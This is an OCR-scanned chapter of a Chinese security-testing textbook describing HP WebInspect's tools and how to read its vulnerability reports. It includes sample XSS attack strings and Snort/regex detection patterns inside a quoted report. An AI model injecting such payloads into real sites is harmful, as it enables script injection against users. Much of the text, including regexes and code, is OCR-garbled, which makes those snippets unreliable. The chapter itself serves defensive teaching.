SQL 注入 是 利用 SQL 查询 中 的 客户 端 提供 的 数据 , 而 不 必 首 先 删除 可 能 有 害 字 符 的 Web 
应 用 程序 技术 。SQL 注入 支持 MS-SQL、Oracle、Postgress、MySQL 和 DB2 作为 数据 库 类 型 ， 
同时 还 支持 多 语言 系统 。 

对 于 SQL 注入 漏洞 工具 测试 ， 创 建 并 提交 HTTP 请 求 可 以 由 用 户 的 SQL 服务 器 处 理 。 
如 果 Web 应 用 程序 允许 使 用 由 用 户 提 供 的 数据 来 更 新 或 创建 数据 库 记 录 , SQL 注入 可 能 产生 
虚假 的 记录 。 为 避免 这 种 可 能 性 ， 不 测试 生产 数据 库 。 相 反 ， 使 用 该 数据 库 的 副本 ， 或 使 用 
不 访问 生产 数据 的 测试 账户 ， 或 排除 任何 可 以 更 新 或 删除 数据 库 中 数据 的 页 面 。 如 果 这 些 替 
代 方 案 不 可 行 ， 在 当 网 站 有 很 少 (或 根本 没有 ) 客 户 流量 的 一 次 测试 之 前 ， 备 份 生产 数据 库 。 


104.14 ERZE 


WebInspect 采用 一 个 广泛 的 军火 库 (arsenal) 的 攻击 代理 ， 旨 在 检测 基于 Web 应 用 程序 中 
的 安全 漏洞 。 它 侦 测 用 户 的 系统 与 成 千 上 万 的 HTTP 请 求 ， 并 评估 个 体 反 应 。 这 种 基于 会 话 
的 扫描 报告 每 个 漏洞 ， 精 确定 位 其 在 应 用 中 的 位 置 ， 并 建议 应 采取 的 纠正 措施 。 这 是 对 系统 
的 定量 分 析 。 

它 还 能 通过 分 级 进行 定性 分 析 。 例 如 ， 健 康 保险 流通 与 责任 法 案 (HIPAA) 要 求 医疗 服务 
提供 者 使 用 基于 Web 的 应 用 程序 提供 “创建 、 更 改 和 维护 密码 的 步骤 。” 用 户 可 评估 自己 的 
申请 ， 然 后 生成 合格 报告 ， 衡 量 应 用 程序 如 何 满足 HIPPA 规则 。 


*404* 软件 安全 测试 及 工具 应 用 (第 2 版 ) 


10.4.15 ”日志 查看 器 


使 用 日 志 查看 器 检查 由 WebInspect 维护 的 各 种 日 志 。 此 功能 主要 供 HP 产品 支持 小 组 调 
查 报 告 事件 。 
10.4.16 ”流量 模式 的 Web 宏 录 制 (过 时 ) 


宏 是 当 访 问 并 登录 到 一 个 网 站 上 发 生 事件 的 记录 。 随 后 ， 用 户 可 指示 HP 扫描 仪 使 用 该 
记录 开始 扫描 。 

WebInspect 10.0 版 包括 一 个 Web 宏 录 制 工 具 。 它 不 包括 在 以 前 的 版 本 中 提供 的 流量 模式 
的 Web 宏 录制 。 但 版 本 10.0 的 Web 宏 录 制 允 许 打开 、 播 放 和 编辑 以 前 的 WebInspect 版 本 中 
创建 的 现 有 流量 模式 宏 ， 并 创造 新 的 流量 模式 宏 ， 使 用 它 的 Intemet Explorer 浏览 器 技术 ( 即 
IE 技术 ) 选 项 。 当 录制 新 宏 时 ， 在 默认 情况 下 ，10.0 版 本 的 Web 宏 录 制 首先 使 用 基于 事件 的 
记录 和 Firefox 浏览 器 技术 , 但 如 果 由 于 某 种 原因 失败 , Web 宏 录制 会 自动 切换 到 访问 流量 模 
式 的 TE 技术 作为 一 种 替代 方法 。 基 于 它 的 多 功能 性 ，10.0 版 本 的 Web 宏 记 录 也 称 为 统一 的 
Web 宏 录 制 。 


10.4.17 ”基于 事件 的 IE 浏览 器 兼容 的 Web 宏 录 制 (隐藏 ) 


WebInspect 10.0 版 包括 一 个 Web 宏 录 制 工具 。 默 认 情况 下 ， 它 使 用 基于 事件 的 功能 和 
Firefox 浏览 器 技术 录制 新 宏 。 在 以 前 的 版 本 中 提供 单独 的 基于 事件 的 TE, 浏览 器 兼容 的 Web 
宏 录 制 无 法 再 通过 WebInspect 菜单 直接 访问 。 实 际 上 ， 它 是 隐藏 的 。 然 而 ， 正 如 本 节 所 述 ， 
10.0 版 本 的 Web 宏 录制 可 以 让 用 户 间 接 打开 、 播 放 和 编辑 在 以 前 的 WebInspect 版 本 中 创建 的 
基于 事件 的 宏 ， 也 允许 创建 新 宏 。 

注意 : HP 强烈 建议 使 用 WebInspect 10.0 版 本 的 Web 宏 录 制 来 记录 所 有 新 登录 宏和 工作 
流 宏 。 


10.4.18 Web 宏 录 制 (统一 ) 


用 Web 宏 录制 工具 来 录制 登录 宏 。 而 Web 宏 录 制 是 WebInspect 10.0 版 本 提供 的 唯一 直 
接 进入 宏 录 制 的 工具 ， 它 提供 (或 可 访问 ) 以 前 的 WebInspect 版 本 的 三 个 Web 宏 录 制 的 功能 。 
基于 它 的 多 功能 性 ，10.0 版 本 的 Web 宏 记 录 也 称 为 统一 的 Web 宏 录 制 。 

Web 宏 录 制 可 以 采用 多 种 启动 方式 ， 同 时 配置 向 导 扫描 或 基础 扫描 。 

被 记录 在 一 个 基础 扫描 或 向 导 扫描 下 的 宏 可 以 在 任 一 类 型 的 扫描 中 使 用 。 

默认 情况 下 ，Web 宏 录 制 操作 使 用 相关 的 Firefox. 浏览 器 技术 来 记录 和 播放 宏 。 它 也 可 
以 使 用 TE 浏览 器 技术 来 记录 和 显示 网 络 流量 数据 。 


10.4.19 Server 事件 探查 器 


使 用 Server 事件 探查 器 来 进行 网 站 的 初步 审查 , 以 确定 某 个 WebInspect 设置 是 否 应 该 被 
修改 。 如 果 更 改 是 必需 的 , Server 事件 探查 器 返回 一 个 建议 列表 , 用 户 可 以 接受 或 拒绝 。 Server 
事件 探查 器 的 界面 如 图 10-78 所 示 。 
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例如 ，Server 事件 探查 器 需要 检测 到 授权 才能 进入 网 站 ， 但 用 户 没 有 指定 一 个 有 效 的 
户 名 和 密码 。 此 时 扫描 的 意义 减轻 ， 用 户 可 按照 Server 事件 探查 器 的 提示 ， 继 续 配 置 所 需 的 
信息 ， 进 行 完整 的 扫描 。 

同样 ， 你 的 设置 可 能 会 指定 WebInspect 不 应 该 执行 “文件 未 找到 ”的 检测 。 这 个 设置 对 
于 不 返回 一 个 “404” 状 态 的 网 站 十 分 有 用 ，( 当 客户 端 请 求 不 存在 的 资源 ， 可 能 代替 返回 状 
态 “200 OK”， 但 响应 中 包含 一 条 找 不 到 该 文件 的 消息 )。 如 果 Server 事件 探查 器 确定 该 计划 
已 在 目标 网 站 实现 ， 它 会 建议 用 户 修改 WebInspect 设置 ， 以 适应 此 功能 。 


F Profile your site 
Fie Hep 


E Server Profiler 


Analyzes your web acplcaton and offers succestions or changes to scan senos. Ortimizng scar settings can improve scan performance and accuracy. 


unis [Tapia spidyramics con. B] sompe sae [i538] 


Settings 


Add Allowed Hosts 
LAE) Mtis possible that some URLs on tne ske have host names that refer to sub-aopications or reated applications. You should 


review the list anc chcose the appropriate hosts to add to the alowed hosts setting. This wll ersure that you scar the entire 
appication. 


Profiler Discovered Allowed Hosts 


Change Authentication Configuration 2c2 


Some servers require authentication from the cient. WebInsoect supports Basic, NTLM, Dicest and Kerberos as well as auto- 


neootiaton. Havra he correct autharticaton satus assures the best nottisle scan resi, ~ 


Save Settinas] 


图 10-78 Server 事件 探查 器 


10.4.20 Server 分 析 


Server 分 析 考 查 一 个 服务 器 , 以 确定 服务 器 的 操作 系统 、 横 幅 、Cookie 和 其 他 信息 。Server 
分 析 界 面 如 图 10-79 所 示 。 


Fi Server Analyzer. 


S È htpjizero webappsecurityco ^ 
Å Non-fatal Error. The underlying web server of the targetidevice has been 
© Site Anabysis Summary || identified as the following 
© Site Anahsis Information || IIS 5.0 
$) Dynamic Form Informatior 
Pf -~e Froen All the underlying web server fingerprints that partially 
WB Application Technology || matched this target/device 
4 Cookies 
@ Server Banners e 13:850 
É Server Authentication e 71540 
@ Files Not Found (404) e 31570 

e 31560 
e 1: SuniPlanet/Netscape 


.1 


图 10-79 Server 分 析 
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10.4.21 SWFScan 


HP 网 络 安全 研究 小 组 开发 SWFScan, 以 帮助 企业 使 用 Adobe Flash 平台 开发 安全 的 应 用 
程序 。 这 一 创新 工具 识别 许多 影响 Flash 应 用 程序 的 漏洞 ， 并 明确 说 明 如 何 消除 或 避免 这 些 
漏洞 。 

SWFScan 唯一 支持 所 有 版 本 的 Adobe Flash 和 ActionScript， 其 中 包括 ActionScript2 和 
3(Flash 版 本 9 和 10)。 

当 Intemet 或 Intranet 上 的 Flash 文件 指向 SWFScan, 或 从 本 地 计算 机 加 载 Flash 文件 时 ， 
SWFScan 反 编译 SWF 字 节 码 ， 生 成 ActionScript 源 代码 ， 并 进行 静态 分 析 。 然 后 ， 可 以 生成 
报告 。 

WFScan 还 提供 了 额外 的 关键 信息 (如 网 络 电话 、 外 部 域 的 请 求 等 ), 对 用 户 手动 检查 Flash 
应 用 程序 十 分 有 用 。 


10.4.22 ”报告 设计 器 


报告 设计 器 是 由 Grape City - Data Dynamics 开发 的 ActiveReports @ 3.0 报告 设计 ， 并 集 
成 到 惠普 产品 中 。 它 具有 创建 和 修改 报告 的 功能 。 

报告 设计 器 包含 6 个 主要 部 件 ， 如 图 10-80 所 示 。 

e THE 

e 设计 器 标签 

。 工具 箱 

。 设计 图 面 

。 报表 资源 管理 器 

。 属性 网 格 


Ce 
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图 10-80 报告 设计 器 
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10423 HP 支持 工具 


HP 支持 工具 提供 了 一 种 快速 简便 的 方法 来 上 传 文件 , 可 以 帮助 HP 技术 支持 人 员 分 析 和 
解决 在 使 用 应 用 程序 安全 中 心 产品 遇 到 任何 问题 。 所 有 通信 都 使 用 SSL 或 FTPS 协议 ， 如 图 
10-81 所 示 。 


mmm 
Be dt Ink Wew Heb 
I [i Sene to rolesh 
et Gba 
Froactintrmaton: 


Product Verson Location ] 
AnpCorsole 92450 Cipragan Fies HP HP Vieoinspect Enterprse 1.0 .|99999999.9993-9999-3999-999999399999 
WetInsoect 2010.0 Ciro Fiest HP Viebinspect 3637C9b7-d70d-46d2-8dEb-903a15832691 
Merosot NET Franewark Rootsüpidate (5 6920.0) [y 

ecureBase and Server Information: 


Securebese Scherra and Engine Version Secureese Server Staus 
16, 60700 Corrected 


System Infrmation: 
'Cperation System Servce Pack 
ndews XP Professional (86) (l6 1.2... Service Paci 2 


SQL Information: 
SQ. Instance. Verson See 


2005 Erorece (592) 
SQL Server 2005 5ervce Pack3 284.8125. 


Admn Rigrts 
SPINdavd thaclery "e 


Updated 


图 10-81 HP 支持 工具 


10.4.24 Web 服务 测试 设计 


Web 服务 是 其 他 应 用 程序 (而 不 是 用 户 ) 和 信息 请 求 的 应 答 通信 程序 。 大 多 数 Web 服务 使 
用 简单 对 象 访问 协议 (SOAP) 发 送 XML 数据 。 与 HTML 不 同 , 它 只 是 描述 了 网 页 的 显示 方式 ， 
XML 提供 了 一 个 框架 描述 ， 并 包含 结构 化 数据 。 客 户 端 Web 应 用 程序 可 以 容易 地 理解 所 返 
回 的 数据 ， 并 将 该 信息 提供 给 最 终 用 户 。 

访问 Web 服务 的 客户 端 Web 应 用 程序 接收 到 一 个 Web 服务 定义 语言 (WSDL) 文 件 ， 以 
便 了 解 如 何 与 该 服务 进行 通信 。WSDL 文档 描述 包含 在 Web 服务 编程 的 程序 、 这 些 程序 期 望 
的 参数 以 及 客户 端 Web 应 用 程序 将 收 到 的 返回 信息 类 型 。 

使 用 Web 服务 测试 设计 来 创建 Web 服务 测试 设计 文件 (filename.wsd)， 该 文件 包含 进行 
Web 服务 扫描 时 WebInspect 提交 的 值 。 


10.5 ”测试 报告 的 导出 和 分 析 


10.5.1 导出 测试 报告 
测试 报告 的 导出 步骤 如 下 : 
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Reports 一 Generate Report 打开 如 图 10-82 所 示 的 对 话 框 : 


[E Policy Manager J£] Report (4 Schedule (M Smartüpdate. 
加 Generate a Report. 9| 


scan Na tart UF tatus 


Vulnerabilites Duration st Sca 


E Site: http://zero.we... http://zero.webapp... Complete 
E Site: http://zero.we... http://zero.webapp... Incomplete 
|E Scan Date: Older (3 items) 


E Site: http://www.q.. http://www.qq.com/ incomplete 25 
E Site: http;//wwws.. http://www.sohu.c.. Incomplete. 0 


图 10-82 选择 报告 生成 项 


10-82 中 列 出 了 已 经 完成 扫描 的 项 目 ， 我 们 可 以 从 中 选择 项 目 来 生成 扫描 报告 。 这 里 
我 们 以 第 二 个 项 目 为 例 来 生成 报告 并 进行 分 析 。 
选择 第 二 项 后 单 击 next 进入 下 一 界面 ， 如 图 10-83 所 示 : 


Eca 


the reports you would like to run 


-Standard Reports — — — 
El Aggregate. 
[E] Alert View 
[E] Attack Status. 
E] Compliance 
[E] Crawled URLS 
E Developer Reference. 
Duplicates 
[E] Executive Summary 
E False Positive. 
E QA Summary 
Scan Difference 
El Scan Log. 
E Trend 
[E Vulnerability 
Vulnerability (Legacy) 


10-83 ”报告 内 容 选 择 项 


图 10-83 中 包含 了 在 扫描 报告 中 希望 显示 的 测试 内 容 ， 如 : 漏洞 (vulnerability)、 针 对 QA 
的 摘要 (QA Summary)、 针 对 开发 人 员 的 建议 (Developer Reference) 等 。 关 于 扫描 报告 的 分 析 我 
们 以 常见 的 Developer Reference, QA Summary、Vulnerability(Legacy) 为 例 来 进行 介绍 。 
选择 Developer Reference， 弹 出 如 图 10-84 所 示 的 界面 。 
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[Z] Generate a Report 


Select the reports you would like to run 


Favorites: 了 
Standard Reporte. 


图 10-84 Developer Reference 检查 点 


图 10-84 中 显示 了 在 报告 中 显示 针对 代码 中 的 “内 容 ”、“cookie”“Email” “参数 ”等 
处 理 给 开发 者 的 建议 。 本 操作 保留 默认 设置 。 
选择 “QA Summary”, 弹出 如 图 10-85 所 示 的 界面 。 


[V] QA Summary. 
] Scan Difference. 
] Scan Log 
] Trend 
] Vulnerability 
Vulnerability (Legacy) 


图 10-85 “QA Summary" HAAA 


选择 此 项 ,报告 中 将 显示 针对 QA ARKE PRERE” WAR” "RA d ERAT 
等 相关 信息 ， 有 助 于 QA 人 员 对 报告 进行 详细 分 析 。 


[E Vulnerability 


[Z] Vulrerabiity (Legacy) 


Advanced) E] Open Reports in Separate Tabs 


图 10-86 “Vulnerability(Legacy)” 检 查 点 


选择 此 项 ， 报 告 中 将 仅 显 示 已 指定 “级 别 ” 的 漏洞 。 如 本 例 中 我 们 选 定 “ 严 重 ”“ 高 ”、 
"rp, "(Es 则 报告 中 仅 显示 这 些 级 别 的 漏洞 。 

上 述 配 置 完成 后 ， 单 击 “Finish”，WebInspect 则 按照 配置 生成 PDF 格式 的 扫描 报告 ， 如 
图 10-87 所 示 。 
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eon tenni 
Multiple Reports 


—— 


图 10-87 ”WebInspect 扫描 报告 封面 


10.52 “分析 测试 报告 


WebInspect 的 测试 报告 和 我 们 前 面 介 绍 的 Fortify 的 测试 报告 一 样 ， 首 先是 总 体 的 概述 ， 
包括 扫描 项 目 、 扫 描 时 间 、 各 种 漏洞 的 柱状 图 或 饼 状 分 布 图 等 。 本 节 我 们 重点 分 析 如 何 读 懂 
报告 中 关于 漏洞 的 分 析 ， 请 看 图 10-88 所 示 的 实例 : 


r: Cookie Security: Persistent Cookie 
Volnerabity 10: 4728 
CWE 10: 239 12 
Kingdom 


Cookies are smal bis of data that are sent by the web apptcabon but stored locally n te browser Ths lets the appicaton use the coke to 
pass information between pages and store variabie nformaton. The web application controis what information is stored in a cookie and how t is 
used. Typical types of infrmaton stored in cookies are session identifiers, personalzaton and customzation information, and n rare cases 
even usernames to enable automated bgms There are two different types of cookes session cookies and persistent cookies. Session 
cookies only ve n the browser's memory, and are not stored anywhere Persistent cotes however. are stored on the browsers hard drive 


ased 


AI cookies are set by the server via the Set-Cookie HTTP Header A browser knows to store that cookie as a persistent cookie when t fnds the 
keyword Express folowed by a date in the future. if there is no Express" tag. or if the specified date has aready passed, then the browser 
Wi keep the cookie in memory only as a session cookie 


To view the persistent coolie set on this page, view the HTTP response and examine the Set-Cookie header. You should see Ihe Expres= tag 
with a future date spected 


Fix 


From a coding perspective, the only distichon between a session coole and a persstent cookie s te txpres»' tag that specifies when a 
persstent cookie should expre If a cookie has no Expres~ tag. then t is automaticaly interpreted as a session cookie. Removing the expraton 
date from the code that sets the cookie wa change t to a session coole. 


Reference Info: 


Microsoft Knowledgebase Article: 
|n of. "T an 


图 10-88 cookie 安全 漏洞 分 析 
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图 10-87 中 是 报告 中 关于 cookie 安全 漏洞 的 分 析 ， 主 要 分 为 以 下 几 个 部 分 : 

Summary: 摘要 。 主 要 包括 漏洞 名 称 、 漏 洞 ID、CWE ID 以 及 关于 cookie 安全 漏洞 的 一 
些 基本 技术 信息 ; 

Execution: 执行 。 介 绍 如 何 去 测 试 和 发 现 这 种 漏洞 ; 

Implication: 牵连 。 主 要 是 介绍 这 里 漏洞 会 产生 什么 样 的 安全 隐患 ， 造 成 什么 样 的 后 果 。 

Fix: 修复 。 如 何 修复 这 种 漏洞 。 

Reference Info: 参考 信息 。 给 出 与 此 类 漏洞 相关 的 技术 文档 的 链接 信息 ， 以 便 查 看 更 具 
体 、 全 面 的 技术 信息 。 

我 们 再 来 分 析 一 个 更 具体 的 漏洞 实例 ， 如 图 10-89 所 示 。 


Cross-Site Scripting: Reflected 


Summary: 
Confirmed By the WeblInspect Agent 


2. The ortacker creates an opock URL 
for dealeg semitive information 
ond disguises it so fhof i! appears 
legtmote 


1. An attacker finds an X55. 
hole in a web applicanon. 


3. The oflochet distributes 


Cross-Site Scripting vulnerability found in Get parameter inputName. The following attack uses plain encoding: 


"> <iMg SrC-x OnCrRoR=alert(25368)> 


Cross-Site Scripting vulnerabilities were verified as executing code on the web application. Cross-Site Scripting occurs when 
dynamically generated web pages display user input, such as login information, that is not properly validated, allowing an 
attacker to embed malicious scripts into the generated page and then execute the script on the machine of any user that 
views the site. In this instance, the web application was vulnerable to an automatic payload, meaning the user simply has to 
visit a page to make the malicious scripts execute. If successful, Cross-Site Scripting vulnerabilities can be exploited to 
manipulate or steal cookies, create requests that can be mistaken for those of a valid user, compromise confidential 
information, or execute malicious code on end user systems. Recommendations include implementing secure programming 
techniques that ensure proper filtration of user-supplied data, and encoding all user supplied data to prevent inserted scripts 
being sent to end users in a format that can be executed. 


Execution 

View the attack string included with the request to check what to search for in the response. For instance, if "(javascript:alert 
('XSS')" is submitted as an attack (or another scripting language), it will also appear as part of the response. This indicates 
that the web application is taking values from the HTTP request parameters and using them in the HTTP response without 
first removing potentially malicious data. 


图 10-89 ” 跨 站 脚本 安全 漏洞 分 析 
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Implication 


XSS can generally be subdivided into two categories: stored and reflected attacks. The main difference between the two 
how the payload arrives at the server. Stored attacks are just that...in some form stored on the target server, such as in a 
database, or via a submission to a bulletin board or visitor log. The victim will retrieve and execute the attack code in his 
browser when a request is made for the stored information. Reflected attacks, on the other hand, come from somewhere else. 
This happens when user input from a web client is immediately included via server-side scripts in a dynamically generated 
web page. Via some social engineering, an attacker can trick a victim, such as through a malicious link or "rigged" form, to 
submit information which will be altered to include attack code and then sent to the legitimate server. The injected code is 
then reflected back to the user's browser which executes it because it came from a trusted server. The implication of each 
kind of attack is the same. 


The main problems associated with successful Cross-Site Scripting attacks are: 


e Account hijacking - An attacker can hijack the user's session before the session cookie expires and take actions with the 
privileges of the user who accessed the URL, such as issuing database queries and viewing the results. 

* Malicious script execution - Users can unknowingly execute JavaScript, VBScript, ActiveX, HTML, or even Flash content 
that has been inserted into a dynamically generated page by an attacker. 

e Worm propagation - With Ajax applications, XSS can propagate somewhat like a virus. The XSS payload can 
autonomously inject itself into pages, and easily re-inject the same host with more XSS, all of which can be done with no 
hard refresh. Thus, XSS can send multiple requests using complex HTTP methods to propagate itself invisibly to the user. 

e Information theft - Via redirection and fake sites, attackers can connect users to a malicious server of the attacker's 
choice and capture any information entered by the user. 

e Denial of Service - Often by utilizing malformed display requests on sites that contain a Cross-Site Scripting vulnerability, 

attackers can cause a denial of service condition to occur by causing the host site to query itself repeatedly . 

Browser Redirection - On certain types of sites that use frames, a user can be made to think that he is in fact on the 

original site when he has been redirected to a malicious one, since the URL in the browser's address bar will remains the 

same. This is because the entire page isn't being redirected, just the frame in which the JavaScript is being executed. 

Manipulation of user settings - Attackers can change user settings for nefarious purposes. 


For more detailed information on Cross-Site Scripting attacks, see the HP Cross-Site Scripting whitepaper. 


Fi 


For Development: 


Cross-Site Scripting attacks can be avoided by carefully validating all input, and properly encoding all output. When validating 
user input, verify that it matches the strictest definition of valid input possible. For example, if a certain parameter is supposed 
to be a number, attempt to convert it to a numeric data type in your programming language. 


PHP: intval("0".$ GET('q7); 


ASP.NET: int.TryParse(Request.QueryString["q"], out val); 


The same applies to date and time values, or anything that can be converted to a stricter type before being used. When 
accepting other types of text input, make sure the value matches either a list of acceptable values (white-listing), or a strict 
regular expression. If at any point the value appears invalid, do not accept it. Also, do not attempt to return the value to the 
user in an error message. 


Most server side scripting languages provide built in methods to convert the value of the input variable into correct, non- 
interpretable HTML. These should be used to sanitize all input before it Is displayed to the client. 


PHP: string htmlspecialchars (string string [, int quote. style]) 

ASP.NET: Server.HTMLEncode (strHTML String) 

When reflecting values into JavaScript or another format, make sure to use a type of encoding that is appropriate. Encoding 
data for HTML is not sufficient when it is reflected inside of a script or style sheet. For example, when reflecting deta in a 
JavaScript string, make sure to encode all non-alphanumeric characters using hex (\xHH) encoding. 

1f you have JavaScript on your page that accesses unsafe information (like location.href) and writes it to the page (either with 
document.write, or by modifying a DOM element), make sure you encode data for HTML before writing it to the page. 
JavaScript does not have a built-in function to do this, but many frameworks do. If you ere lacking an available function, 
something like the following will handle most cases: 

s = s.replace(/8/g,'&amp; ).replace(/"/I, &quot;").replace(/ «/I'&lt;").replace(/ »/1,'&gt;").replace(/'/I'&apos;") 


Ensure that you are always using the right approach at the right time. Validating user input should be done as soon as it is 
received. Encoding data for display should be done immedictely before displaying it. 


图 10-89 ” 跨 站 脚本 安全 漏洞 分 析 ( 续 ) 
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For Security Operations: 


Server side encoding, where all dynamic content is first sent through an encoding function where Scripting tags will be 
replaced with codes in the selected character set, can help to prevent Cross-Site Scripting attacks. 


Many web application platforms and frameworks have some built-in support for preventing Cross-Site Scripting. Make sure 
that any built-in protection is enabled for your platform. In some cases, a misconfigurction could allow Cross-Site Scripting. In 
ASP.NET, if a page's EnableViewStateMac property is set to False, the ASP.NET view state can be used as a vector for Cross- 
Site Scripting. 


An IDS or IPS can also be used to detect or filter out XSS attacks. Below are a few regular expressions that will help detect. 
Cross-Site Scripting. 


Regex for a simple XSS attack: 
KWIC) «)((962F) V)*[a-z0-9V*o] (963b) >)/ix 


The above regular expression would be added into a new Snort rule as follows: 

alert tcp $EXTERNAL_NET any -> SHTTP SERVERS $HTTP. PORTS (msg:"NII Cross-Site Scripting attempt"; 

flow:to. server,established; pcre:"/((963C) «)((962F) V)*[a-z0-919o]--((963E) »)/i"; classtype:Web-application-attack; 
sid:9000; rev:5;) 


Paranoid regex for XSS attacks: 
A(\%3C) INNnI+ (ON%3E) 2)/1 


This signature simply looks for the opening HTML tag, and its hex equivalent, followed by one or more characters other than 
the new line, and then followed by the closing tag or its hex equivalent. This may end up giving a few false positives 
depending upon how your web application and web server are structured, but it is guaranteed to catch anything that cven 
remotely resembles a Cross-Site Scripting attack. 

For QA: 


Fixes for Cross-Site Scripting defects will ultimately require code based fixes. Read the HP Cross-Site Scripting white paper for 
more information about manually testing your application for Cross-Site Scripting. 


Reference 


HP Cross-Site Scripting Whitepaper 
http://download.hpsmartupdate.com/asclabs/cross-site scripting.pdf 


OWASP Cross-Site Scripting Information 
7 M ntation/topten, l 


Microsoft 


Microsoft Anti-Cross Site Scripting Library V1.0 
ttp; :loads/details.aspx?fa 


CERT 
http://www.cert.org/advisories/CA-2000-02.html 


Apache 


SecurityFocus.com 
hitp://viww.securityfocus.com/infocus/1768. 


Classifications 
CWE-79: Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting") 
http://ewe.mitre.org/dato/definitions/79.html 


CWE-80: Improper Neutralization of Script-Related HTML Tags in a Web Page (Basic XSS) 
http://cwe.mitre.org/data/defmitions/80.html 


CWE-82: Improper Neutralization of Script in Attributes of IMG Tags in a Web Page 
hitp;//cwe.mitre.org/data/definitions/82.html 


CWE-83: Improper Neutralization of Script in Attributes in a Web Page 
http://cwe.mitre.org/data/definitions/83.html 


CWE-87: Improper Neutralization of Alternate XSS Syntax 
http://cwe.mitre.org/data/definitions/87.html 


CWE-116: Improper Encoding or Escaping of Output 
http://cwe mitre org/data/definitions/116 html 


图 10-89 ” 跨 站 脚本 安全 漏洞 分 析 ( 续 ) 


10-89 是 关于 跨 站 脚本 漏洞 的 测试 报告 。 其 中 包含 了 我 们 前 文中 对 扫描 报告 显 7 
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的 所 有 配置 项 ; 

a) Critical: 严重 。 指 明 漏洞 的 级 别 为 “严重 ”。 

b) Summary: 关于 本 漏洞 的 摘要 信息 。 指 明 本 漏洞 为 " 跨 站 脚本 "漏洞 。 

c) 原理 图 : 说明 跨 站 脚本 漏洞 的 工作 原理 或 攻击 原理 。 

d) Execution: 执行 。 简 要 说 明 该 漏洞 的 执行 过 程 。 

e) Implication: 牵连 。 说 明 该 漏洞 包含 哪些 安全 隐患 ， 以 及 相关 介绍 。 

fFix: 针对 开发 人 员 的 修改 建议 , 给 出 了 几 种 开发 语言 的 实例 ; 对 于 QA 人 员 ， 请 参考 
惠普 官网 关于 此 类 漏洞 的 白皮书 ， 获 得 更 多 技术 信息 。 

g) Reference: 参考 信息 。 给 出 与 此 类 漏洞 相关 的 技术 文档 的 链接 信息 , 以 使 查看 更 具体 、 
全 面 的 技术 信息 。 

h) Classifications: 关于 CWE 常见 缺陷 列表 中 关于 跨 站 脚本 漏洞 的 技术 分 析 。 

需要 特别 指出 的 是 ， 参 考 信息 (Reference Info) 中 列 出 的 技术 文档 链接 可 以 帮助 我 们 全 面 
了 解 安全 漏洞 的 技术 信息 ， 对 于 提升 技术 水 平 有 很 高 的 参考 价值 。 


10.6 ”本 童 小 结 


本 章 介绍 了 WebInspect 的 应 用 实践 , 主要 分 为 四 部 分 ,第 一 部 分 介绍 了 WebInspect 的 基 
本 按钮 ， 包 括 按钮 栏 、 菜 单 栏 、 工 具 栏 以 及 其 他 一 些 组 件 。 第 二 部 分 主要 介绍 了 WebInspect 
的 5 大 功能 ， 是 第 一 部 分 基本 按钮 的 综合 使 用 ， 是 该 工具 的 应 用 核心 ， 包 括 向 导 扫 描 、 基 础 
扫描 、Web 服务 扫描 、 企 业 扫描 以 及 生成 报告 ， 通 过 基础 扫描 、Web 服务 扫描 、 企 业 扫 描 可 
以 对 Web 应 用 程序 和 Web 服务 进行 漏洞 评估 ， 生 成 的 报告 可 以 对 漏洞 的 分 布 以 及 漏洞 代码 
有 更 全 面 的 直观 认识 ， 也 可 以 直接 将 此 报告 提交 给 网 站 开发 人 员 ， 让 他 们 根据 网 站 的 实际 情 
况 对 漏洞 进行 修复 。 第 三 部 分 是 对 WebInspect 一 套 强大 诊断 和 渗透 测试 工具 的 简 述 ， 这 些 工 
其 集成 在 WebInspect 中 ， 使 用 它们 能 更 方便 地 对 结果 进行 分 析 。 第 四 部 分 指导 我 们 如 何 去 读 
懂 一 份 扫描 报告 ， 从 扫描 报告 中 获得 有 效 的 漏洞 信息 ; 对 于 漏洞 的 防范 、 修 复 、 测 试 具 有 很 
高 的 参考 价值 ， 体 现 了 Webinspact 的 技术 价值 。 


